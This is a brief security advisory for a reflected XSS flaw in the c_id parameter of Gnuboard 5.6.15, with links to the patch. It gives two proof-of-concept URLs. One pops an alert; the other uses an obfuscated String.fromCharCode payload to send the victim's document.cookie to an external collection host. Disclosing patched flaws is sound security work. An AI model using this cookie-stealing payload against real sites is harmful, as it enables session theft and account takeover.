Gnboard 5.6.15 Open-source git address

https://github.com/gnuboard/gnuboard5

Patched Version: Gnuboard 5.6.16 https://sir.kr/g5_pds/7495

Patch history : https://github.com/gnuboard/gnuboard5/commit/002e43e5fb84b465357b445772c881e196e100d3

Reflected XSS occurred in the latest version of current reference Gnboard5 5.6.15.

If you have permission to write comments on a post after accessing the post, the vulnerability occurs through the c_id value among the hidden values required to write comments.

Below is the Attacking Proof Code (PoC) and can be tested by switching to ascii code using the String.fromCharCode function and specifying the domain you want.

PoC

[http://127.0.0.1:8081/bbs/board.php?bo_table=free&wr_id=1&c_id=1](<http://127.0.0.1:8081/bbs/board.php?bo_table=free&wr_id=1&c_id=1>)"style=content-visibility:auto%20oncontentvisibilityautostatechange=alert(/tetest/)//

[http://127.0.0.1:8081/bbs/board.php?bo_table=free&wr_id=1&c_id=1](<http://127.0.0.1:8081/bbs/board.php?bo_table=free&wr_id=1&c_id=1>)"style=content-visibility:auto%20oncontentvisibilityautostatechange=location.href=String.fromCharCode(104,116,116,112,115,58,47,47,121,112,119,109,108,118,105,46,114,101,113,117,101,115,116,46,100,114,101,97,109,104,97,99,107,46,103,97,109,101,115,47,116,63,99,61)%2Bdocument.cookie//